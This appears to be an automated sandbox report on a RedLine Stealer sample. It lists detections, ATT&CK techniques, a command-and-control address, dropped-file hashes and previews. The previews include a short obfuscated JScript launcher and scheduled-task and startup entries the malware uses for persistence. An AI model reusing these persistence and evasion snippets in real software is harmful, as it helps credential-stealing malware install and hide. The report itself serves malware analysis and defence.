Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match

File source: Process Memory Space: RegAsm.exe PID: 5460, type: MEMORYSTR

Source: TurtleHarbor.pif	Binary or memory string: WIN_81
Source: TurtleHarbor.pif	Binary or memory string: WIN_XP
Source: TurtleHarbor.pif	Binary or memory string: WIN_XPe
Source: TurtleHarbor.pif	Binary or memory string: WIN_VISTA
Source: TurtleHarbor.pif	Binary or memory string: WIN_7
Source: TurtleHarbor.pif	Binary or memory string: WIN_8
Source: Intake.pif.1.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match

File source: Process Memory Space: RegAsm.exe PID: 5460, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_0038696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	18_2_0038696E
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_00386E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	18_2_00386E32
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_0038696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	20_2_0038696E
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_00386E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	20_2_00386E32

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	2 Valid Accounts	1 Windows Management Instrumentation	111 Scripting	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	31 Input Capture	2 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	31 Input Capture	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Command and Scripting Interpreter	2 Valid Accounts	2 Valid Accounts	2 Obfuscated Files or Information	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	3 Clipboard Data	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	27 System Information Discovery	Distributed Component Object Model	Input Capture	11 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	2 Registry Run Keys / Startup Folder	212 Process Injection	11 Masquerading	LSA Secrets	231 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Scheduled Task/Job	2 Valid Accounts	Cached Domain Credentials	41 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	2 Registry Run Keys / Startup Folder	41 Virtualization/Sandbox Evasion	DCSync	4 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	212 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe	39%	ReversingLabs	Win32.Trojan.Amadey
e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe	35%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	5%	ReversingLabs
C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	9%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\684126\Intake.pif	5%	ReversingLabs
C:\Users\user\AppData\Local\Temp\684126\Intake.pif	9%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	0%	Virustotal	Browse

Source	Detection	Scanner	Label	Link
http://www.fontbureau.com	0%	URL Reputation	safe
http://www.fontbureau.com/designersG	0%	URL Reputation	safe
https://api.ip.sb/ip	0%	URL Reputation	safe
http://www.fontbureau.com/designers/?	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.fontbureau.com/designers?	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
https://api.ip.s	0%	URL Reputation	safe
http://www.fontbureau.com/designers	0%	URL Reputation	safe
http://nsis.sf.net/NSIS_ErrorError	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.fontbureau.com/designers/cabarga.htmlN	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.fontbureau.com/designers/frere-user.html	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.autoitscript.com/autoit3/J	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.fontbureau.com/designers8	0%	URL Reputation	safe
http://www.apache.org/licenses/LICENSE-2.0	0%	Avira URL Cloud	safe
http://www.fonts.com	0%	URL Reputation	safe
http://www.fonts.com	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
https://www.autoitscript.com/autoit3/	0%	Avira URL Cloud	safe
45.200.149.147:27667	0%	Avira URL Cloud	safe
https://discord.com/api/v9/users/	0%	Avira URL Cloud	safe
http://www.apache.org/licenses/LICENSE-2.0	0%	Virustotal		Browse
45.200.149.147:27667	1%	Virustotal		Browse
https://www.autoitscript.com/autoit3/	0%	Virustotal		Browse
https://discord.com/api/v9/users/	0%	Virustotal		Browse
http://www.autoitscript.com/autoit3/J	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
CvcMEMMQKdoWtsiZdkN.CvcMEMMQKdoWtsiZdkN	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
45.200.149.147:27667	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.autoitscript.com/autoit3/J	Intake.pif, 0000000A.00000003.1676899367.0000000003736000.00000004.00000800.00020000.00000000.sdmp, Intake.pif, 0000000A.00000000.1669006674.0000000000E99000.00000002.00000001.01000000.00000005.sdmp, TurtleHarbor.pif, 00000012.00000000.1688045792.00000000003D9000.00000002.00000001.01000000.00000008.sdmp, TurtleHarbor.pif, 00000014.00000000.1798912259.00000000003D9000.00000002.00000001.01000000.00000008.sdmp, Nevertheless.0.dr, TurtleHarbor.pif.10.dr, Intake.pif.1.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	RegAsm.exe, 0000001A.00000002.3208069125.0000000007282000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.fontbureau.com	RegAsm.exe, 0000001A.00000002.3208069125.0000000007282000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designersG	RegAsm.exe, 0000001A.00000002.3208069125.0000000007282000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.ip.sb/ip	RegAsm.exe, 0000001F.00000002.3855499519.0000000002869000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/?	RegAsm.exe, 0000001A.00000002.3208069125.0000000007282000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/bThe	RegAsm.exe, 0000001A.00000002.3208069125.0000000007282000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	RegAsm.exe, 0000001A.00000002.3208069125.0000000007282000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.tiro.com	RegAsm.exe, 0000001A.00000002.3208069125.0000000007282000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.ip.s	RegAsm.exe, 0000001A.00000002.3204845308.0000000003061000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3855499519.0000000002869000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers	RegAsm.exe, 0000001A.00000002.3208069125.0000000007282000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe	false	URL Reputation: safe	unknown
http://www.goodfont.co.kr	RegAsm.exe, 0000001A.00000002.3208069125.0000000007282000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.autoitscript.com/autoit3/	Intake.pif, 0000000A.00000003.1676899367.0000000003736000.00000004.00000800.00020000.00000000.sdmp, Nevertheless.0.dr, TurtleHarbor.pif.10.dr, Intake.pif.1.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.carterandcone.coml	RegAsm.exe, 0000001A.00000002.3208069125.0000000007282000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sajatypeworks.com	RegAsm.exe, 0000001A.00000002.3208069125.0000000007282000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.typography.netD	RegAsm.exe, 0000001A.00000002.3208069125.0000000007282000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	RegAsm.exe, 0000001A.00000002.3208069125.0000000007282000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	RegAsm.exe, 0000001A.00000002.3208069125.0000000007282000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	RegAsm.exe, 0000001A.00000002.3208069125.0000000007282000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn	RegAsm.exe, 0000001A.00000002.3208069125.0000000007282000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-user.html	RegAsm.exe, 0000001A.00000002.3208069125.0000000007282000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/	RegAsm.exe, 0000001A.00000002.3208069125.0000000007282000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://discord.com/api/v9/users/	RegAsm.exe, 0000001F.00000002.3855499519.0000000002941000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/DPlease	RegAsm.exe, 0000001A.00000002.3208069125.0000000007282000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	RegAsm.exe, 0000001A.00000002.3208069125.0000000007282000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fonts.com	RegAsm.exe, 0000001A.00000002.3208069125.0000000007282000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://www.sandoll.co.kr	RegAsm.exe, 0000001A.00000002.3208069125.0000000007282000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.deDPlease	RegAsm.exe, 0000001A.00000002.3208069125.0000000007282000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	RegAsm.exe, 0000001A.00000002.3208069125.0000000007282000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://www.sakkal.com	RegAsm.exe, 0000001A.00000002.3208069125.0000000007282000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1502159
Start date and time:	2024-08-31 10:01:04 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 25s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	33
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe
Detection:	MAL
Classification:	mal100.troj.expl.evad.winEXE@46/23@1/0
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 79 Number of non-executed functions: 322
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 184.28.90.27
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
04:01:53	API Interceptor	1x Sleep call for process: e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe modified
04:01:56	API Interceptor	5340x Sleep call for process: Intake.pif modified
09:01:56	Task Scheduler	Run new task: Additionally path: wscript s>//B "C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.js"
09:01:59	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TurtleHarbor.url

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	RedLine	Browse
	6I8BO0tIYE.exe	Get hash	malicious	SmokeLoader	Browse
	capcut Setup-x64.msi	Get hash	malicious	RedLine	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	aIye4PP6zx.exe	Get hash	malicious	Unknown	Browse
C:\Users\user\AppData\Local\Temp\684126\Intake.pif	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	RedLine	Browse
	6I8BO0tIYE.exe	Get hash	malicious	SmokeLoader	Browse
	capcut Setup-x64.msi	Get hash	malicious	RedLine	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	aIye4PP6zx.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1119
Entropy (8bit):	5.345080863654519
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0Hj
MD5:	88593431AEF401417595E7A00FE86E5F
SHA1:	1714B8F6F6DCAAB3F3853EDABA7687F16DD331F4
SHA-256:	ED5E60336FB00579E0867B9615CBD0C560BB667FE3CEE0674F690766579F1032
SHA-512:	1D442441F96E69D8A6D5FB7E8CF01F13AF88CA2C2D0960120151B15505DD1CADC607EF9983373BA8E422C65FADAB04A615968F335A875B5C075BB9A6D0F346C9
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.js

Download File

Process:	C:\Users\user\AppData\Local\Temp\684126\Intake.pif
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	192
Entropy (8bit):	4.718347524161944
Encrypted:	false
SSDEEP:	3:RiMIpGXJO9obdPHo55wWAX+Ro6p4EkD52AG9J01+qROyBc5uWAX+Ro6p4EkD52Am:RiJuOybJHonwWDKaJkDdUJ0IT0cwWDKW
MD5:	647CC3E3DED0BA6F0AFAFD5FA290C48C
SHA1:	26638AA43EA062E41DD7807EC83C7C78B7FE1CC9
SHA-256:	9805C1387908C583E06D2518451EF1ABC3F803DC6096C2239B9C406B13C82D4C
SHA-512:	59B1D6902BA337BD51CD37C4EF03ECDD08778D1C2FB1F21E285D0D81EA5AA4F7A8BD30F0F891C858BBD1D348094DC2636969660F5955A5F1310A3714CCEC3E27
Malicious:	true
Preview:	new ActiveXObject("Wscript.Sh" + "ell").Exec("\"C:\\Users\\user\\AppData\\Local\\SecureData Technologies\\TurtleHarbor.pif\" \"C:\\Users\\user\\AppData\\Local\\SecureData Technologies\\Y\"")

C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif

Download File

Process:	C:\Users\user\AppData\Local\Temp\684126\Intake.pif
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	893608
Entropy (8bit):	6.62028134425878
Encrypted:	false
SSDEEP:	12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
MD5:	18CE19B57F43CE0A5AF149C96AECC685
SHA1:	1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
SHA-256:	D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
SHA-512:	A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5% Antivirus: Virustotal, Detection: 9%, Browse
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: 6I8BO0tIYE.exe, Detection: malicious, Browse Filename: capcut Setup-x64.msi, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: aIye4PP6zx.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\SecureData Technologies\Y

Download File

Process:	C:\Users\user\AppData\Local\Temp\684126\Intake.pif
File Type:	data
Category:	dropped
Size (bytes):	782525
Entropy (8bit):	7.999758284980152
Encrypted:	true
SSDEEP:	12288:osRhGHFIBMcJ14VnEOf/oxc2JrYwkUcYDeCd5857NVpmtC0kdhtw8E9zuechT:osR8FIGcJ149EO3oBJEw2YDeCeLpmtC5
MD5:	0687024F2F53AC5521C7906F3FE520AA
SHA1:	ED39DD96A9817591B49F918E2681746880FAB7F3
SHA-256:	112BD1117039E48F288BAF93AF0F32425E8C713D286C035C9E17E8FB1C109DC1
SHA-512:	617E34EA0D74DE0DDDA1EAE4A164B512B5E9F0495A3FB37A179D54D660CE3E9E300F0B7963ABBBE8D4EEF597253C7F98ACEA5BAE0A08C0C6D3ABB0F455541FA8
Malicious:	false
Preview:	.eC%....n.,..pP..".`...B?6.^..2b>..P..t.)9_.........U.q}.Xl...>.'.i.q.G}...f..J.^W.s...M..q8z7..e..J..pB.."..V.".;;.a.QC.:.D.X4...a...1.#...r....[..,.1..D...m...Yj[@lc.V.{[.../..\..#.....3......;.B..H....Z.\|k.........."..T.9..si..4.U...c.......(.e.J.M..w[.D5^US..;....br..N....6.\|>..H%.Da.<`>..uBo...R.)..z}..:Q.4.q..I..5".u.C.H...Q.+...,M.?.A..#@\|.).Bly.0.G..5...... .....fy...o..J.J.u.H...2.V.z7["heE..,O......b.....y.d.[G/.g..(d:.O.Y%.....v..kv........v\..7.W.].q).P..\|.;.m......uy#..u.Q&..]......)..)d.{...`c.6..;9-.....l\|..`.\y..e\|O.._aSi.....<.^ro..*...`R...G_>e.zh6R,...Me$v.......Q......x...>{....9.\|$!..px..X..0..Y.ysQ+.G.f'......+..0y:}I.=...P...?..4Q..Q5I.K..;.j~...i.);.........uM..`~U'.3y..\|k.......c.9..0.n....r....c.p.5./...l..n..s....j\.M\|.spJP.r......'p..6.s .r.}.E..3.....v,.vh....^C.FT.P/.....u.VL.2... cK...0[+.f.'/tq...l.6......+..(bZ.@.....o..M...)v...-h8.0.....I...vX.0mL..@7....N..3.-...ha..[M..d.....f(.F[..r......

C:\Users\user\AppData\Local\Temp\684126\C

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	data
Category:	dropped
Size (bytes):	782525
Entropy (8bit):	7.999758284980152
Encrypted:	true
SSDEEP:	12288:osRhGHFIBMcJ14VnEOf/oxc2JrYwkUcYDeCd5857NVpmtC0kdhtw8E9zuechT:osR8FIGcJ149EO3oBJEw2YDeCeLpmtC5
MD5:	0687024F2F53AC5521C7906F3FE520AA
SHA1:	ED39DD96A9817591B49F918E2681746880FAB7F3
SHA-256:	112BD1117039E48F288BAF93AF0F32425E8C713D286C035C9E17E8FB1C109DC1
SHA-512:	617E34EA0D74DE0DDDA1EAE4A164B512B5E9F0495A3FB37A179D54D660CE3E9E300F0B7963ABBBE8D4EEF597253C7F98ACEA5BAE0A08C0C6D3ABB0F455541FA8
Malicious:	false
Preview:	.eC%....n.,..pP..".`...B?6.^..2b>..P..t.)9_.........U.q}.Xl...>.'.i.q.G}...f..J.^W.s...M..q8z7..e..J..pB.."..V.".;;.a.QC.:.D.X4...a...1.#...r....[..,.1..D...m...Yj[@lc.V.{[.../..\..#.....3......;.B..H....Z.\|k.........."..T.9..si..4.U...c.......(.e.J.M..w[.D5^US..;....br..N....6.\|>..H%.Da.<`>..uBo...R.)..z}..:Q.4.q..I..5".u.C.H...Q.+...,M.?.A..#@\|.).Bly.0.G..5...... .....fy...o..J.J.u.H...2.V.z7["heE..,O......b.....y.d.[G/.g..(d:.O.Y%.....v..kv........v\..7.W.].q).P..\|.;.m......uy#..u.Q&..]......)..)d.{...`c.6..;9-.....l\|..`.\y..e\|O.._aSi.....<.^ro..*...`R...G_>e.zh6R,...Me$v.......Q......x...>{....9.\|$!..px..X..0..Y.ysQ+.G.f'......+..0y:}I.=...P...?..4Q..Q5I.K..;.j~...i.);.........uM..`~U'.3y..\|k.......c.9..0.n....r....c.p.5./...l..n..s....j\.M\|.spJP.r......'p..6.s .r.}.E..3.....v,.vh....^C.FT.P/.....u.VL.2... cK...0[+.f.'/tq...l.6......+..(bZ.@.....o..M...)v...-h8.0.....I...vX.0mL..@7....N..3.-...ha..[M..d.....f(.F[..r......

C:\Users\user\AppData\Local\Temp\684126\Intake.pif

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	893608
Entropy (8bit):	6.62028134425878
Encrypted:	false
SSDEEP:	12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
MD5:	18CE19B57F43CE0A5AF149C96AECC685
SHA1:	1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
SHA-256:	D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
SHA-512:	A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5% Antivirus: Virustotal, Detection: 9%, Browse
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: 6I8BO0tIYE.exe, Detection: malicious, Browse Filename: capcut Setup-x64.msi, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: aIye4PP6zx.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\684126\Intake.pif
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	65440
Entropy (8bit):	6.049806962480652
Encrypted:	false
